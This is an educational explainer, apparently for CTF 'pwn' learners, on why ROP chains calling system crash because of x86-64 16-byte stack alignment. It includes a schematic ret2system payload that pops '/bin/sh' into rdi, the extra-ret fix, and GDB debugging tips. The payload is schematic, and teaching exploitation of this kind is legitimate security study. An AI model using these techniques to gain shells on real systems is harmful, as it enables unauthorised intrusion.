16-Byte Alignment
Table of Contents
16-Byte Alignment
In the world of Pwn, 16-byte alignment (Stack Alignment) is absolutely a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when running locally or attacking remotely, the program mysteriously crashes directly with SIGSEGV (segmentation fault) inside system or printf.
It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.
1. Why does this rule exist? (Hardware’s “OCD”)
This rule comes from the x86-64 SSE (Streaming SIMD Extensions) instruction set.
For maximum performance, when the CPU processes 128-bit (16-byte) data (such as floating-point operations), it uses instructions like movaps (Move Aligned Packed Single-Precision Floating-Point Values).
- Unwritten rule:
movapsrequires the memory address being operated on to be divisible by 16 (that is, the last hexadecimal digit of the address must be0). - Consequence: If the address is not aligned, the CPU will directly refuse to work, throw an exception, and crash the program.
Modern
glibcfunctions (such asprintfandsystem) make heavy use of these instructions internally for optimization.
2. The “dynamic changes” of 16-byte alignment
This is the part that most easily confuses people. According to the System V ABI standard:
Before executing the
callinstruction, the stack pointerRSPmust be 16-byte aligned.
Let’s track how the stack changes:
-
Before the call:
RSP=0x...00(16-byte aligned, address ending in 0). -
Execute
call: The CPU automatically pushes the return address (8 bytes) onto the stack.- At this point,
RSPbecomes0x...F8(no longer a multiple of 16, offset by 8 bytes).
- At this point,
-
Enter the function body: The first instruction of the function is usually
push rbp.- At this point,
RSPbecomes0x...F0(hey! back to being a multiple of 16).
- At this point,
Conclusion: While executing logic inside the function body, the compiler assumes by default that RSP is aligned. But if you jump directly to the start of the function by special means (such as ROP), the situation is different.
3. A Pwn player’s nightmare: the alignment pit in a ROP chain
When you build a ROP chain, you are effectively manually “stitching together” return addresses.
Typical failure case:
You found the address of system and prepared pop rdi; ret for argument passing. Your payload looks like this:
[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]
In this process, you skip the normal call flow and jump directly into system via ret. If at this moment your RSP happens to be sitting at an “awkward” position (for example, ending in 8 instead of 0), then as soon as system executes movaps internally, it will crash immediately.
4. The ultimate remedy: add one more ret
If you find that your ROP chain crashes when calling system, and debugging shows it dies on movaps, the simplest black magic is: before calling the target function, insert a useless ret instruction.
Fixed payload:
[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]
- Principle: The essence of
retispop rip. Executing one extraretmovesRSPby 8 bytes, achieving a gorgeous transition “from unaligned to aligned.”
5. How do you identify it while debugging?
In GDB (for example, using the pwndbg plugin), when you crash:
- Look at the instruction where it crashed. If it is something like
movaps XMMWORD PTR [rsp+...], xmm.... - Check the value of
RSP. If the last digit of the address is not0(for example, it is8). - Case closed: this is a 16-byte alignment problem.
Summary Notes
| State | RSP State | Notes |
|---|---|---|
| Before a standard Call | Must be aligned (ends in 0) | Mandatory ABI requirement |
| After executing Call | Unaligned (ends in 8) | Because an 8-byte return address was pushed |
| Crash after ROP jump | Usually ends in 8 | Causes SIMD instructions inside system to fail |
| Alignment strategy | Add one ret instruction | Force a shift by 8 bytes to cancel the offset |
Now you understand why sometimes your payload logic is completely correct, yet you still need to mysteriously add one more ret to make it work, right? Do you want to look at an actual piece of assembly code that causes this kind of crash for this alignment issue, or are you already ready to talk about the “ultimate trick” involving printf variadic arguments and registers?